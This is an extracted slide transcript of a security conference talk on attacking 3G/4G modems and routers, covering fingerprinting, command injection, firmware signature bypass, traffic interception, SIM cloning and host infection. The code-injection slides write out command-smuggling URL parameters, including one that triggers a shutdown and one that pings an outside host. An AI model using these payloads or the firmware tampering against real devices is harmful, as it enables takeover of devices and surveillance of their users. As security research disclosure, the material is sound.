How to build Big Brother

  • Published on
    13-Apr-2017

  • View
    291

  • Download
    3

Transcript

PowerPoint PresentationHow to build Big BrotherTim Yunusov@a66atHow to build Big BrotherWith blackjack and h kersWith 3G modems and hackersTim Yunusov@a66atAbout meTim YunusovSenior Expert, Application SecurityPositive Technologieshttps://uk.linkedin.com/in/tyunusovtyunusov@ptsecurity.com@a66atWhen/Who/Where/And why???2014-2015When/Who/Where/And why???2014-2015root via SMS SCADAStrangeLove https://youtu.be/T9AFFIVpCa8Russia and the whole worldWhen/Who/Where/And why???2014-2015root via SMS SCADA Strange Love https://youtu.be/T9AFFIVpCa8Russia and the whole worldCause nobody cares(((Boring stats 1 () - imgBoring stats>10 (8 diff) 3G/4G modems/routers75% vulns to RCE/fw modification60% RCE are 0daysBoring stats~60 000 devices/1M/Telco5000 devices/1W/SecurityLab100% vulns to RCE/fw modificationHowHowIdentificationCode injectionData interceptionSIM cloning / GSM AttacksHost InfectionAPTIdentificationWHOISFingerprintingPublic DatabasesFingerprintingFingerprintingmini_httpd/1.19 19dec2003 /html/index.htmlHowIdentificationCode injectionData interceptionSIM cloning / GSM AttacksHost InfectionAPTCode InjectionPublic exploits + old FWBlackboxFW Access + FW RE + IDAFW modification + Arbitrary uploadCode InjectionCode Injection?action=ping || shutdown r 0 ||?date=;ping%20blahblah.com;%20Code Injection?action=ping || shutdown r 0 ||?date=;ping%20blahblah.com;%20Code InjectionFW Access + FW RE + WEB DISASSMGreetings: Kirill Nesterov Dmitry SklyarovCode InjectionFW Access + FW RE + #USETHEFORCECode InjectionFW modification + Arbitrary uploadIntegrity attacksRemote uploading (CSRF/XSS)Local upload (diag mode)Code InjectionIntegrity attacksFW encrypted via RC4RSA digital signature + SHA1Code InjectionIntegrity attacksCode InjectionFW encrypted via RC4Constant keystreamFAILPart1 XOR Part2FAILFW1 XOR FW2FAILLot of plaintext (CDROM)FAILCode InjectionFW encrypted via RC4FAILConstant keystreamFAILPart1 XOR Part2FAILFW1 XOR FW2FAILLot of plaintext (CDROM)FAILCode InjectionRSA Digital Signature +SHA1AR: !:FW filespkginfo: sign=RSA(SHA1(FW[0..7742526]))Code InjectionRSA Digital Signature +SHA1AR: !:FW filespkginfo: sign=RSA(SHA1(FW[0..7742526]))Code InjectionRSA Digital Signature +SHA1AR: !:FW filespkginfo: sign=RSA(SHA1(FW[0..7742526]))Code InjectionRSA Digital Signature +SHA1ar --add data.tar.gzar -vdata.tar.gzsignpkginfodata.tar.gzCode InjectionRSA Digital Signature +SHA1FAILar --add data.tar.gzar -vdata.tar.gzsignpkginfodata.tar.gzCode InjectionFW uploading via CSRFhttp://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.htmlCode InjectionFW uploading via XSS HUAWEI PSIRT 436642 (2015-05-29)http://www1.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-436642.htmHowIdentificationCode injectionData interceptionSIM cloning / GSM AttacksHost InfectionAPTData InterceptionCell IDWiFiSMSHTTPSSLData InterceptionCell ID + http://opencellid.org/RCE XSSData InterceptionWi-FiData InterceptionSMSData InterceptionHTTPARP spoofingDNS spoofingData InterceptionSSLHost RCEHowIdentificationCode injectionData interceptionSIM cloning / GSM AttacksHost InfectionAPTGEO(!) + IMSI =Fake BTS + Binary SMSOSMO + Radio dump + Kraken https://media.blackhat.com/us-13/us-13-nohl-rooting-sim-cards-slides.pdfSIM Cloning + GSM attacks#USETHEFORCESIM Cloning + GSM attacksDiag ModeSIM Cloning + GSM attacksSend AT commandsAT+CMGF=0SIM Cloning + GSM attacksHowIdentificationCode injectionData interceptionSIM cloning / GSM AttacksHost InfectionAPTHost InfectionBadUSBFake diagnostic tools/CDROMHTML Injection + 0dayEven real diagnostic tools =))Host InfectionDrive By DownloadCD-ROMHost InfectionHTML Injection + 0dayHost InfectionKudos to @cyberpunkychLots of other stuff at http://yota.hlsec.ruHowIdentificationCode injectionData interceptionSIM cloning / GSM AttacksHost InfectionAPTAPTAPTSubscribers attacks subscribersLISTEN 0.0.0.0:80FirewallsHowIdentificationCode injectionData interceptionSIM cloning / GSM AttacksHost InfectionAPTResumeKUDOS@cyberpunkych@GIFTSUNGIVEN@SCADASLD. SklyarovK. NesterovWrite me ;-)Tim Yunusovhttps://uk.linkedin.com/in/tyunusovtyunusov@ptsecurity.com@a66at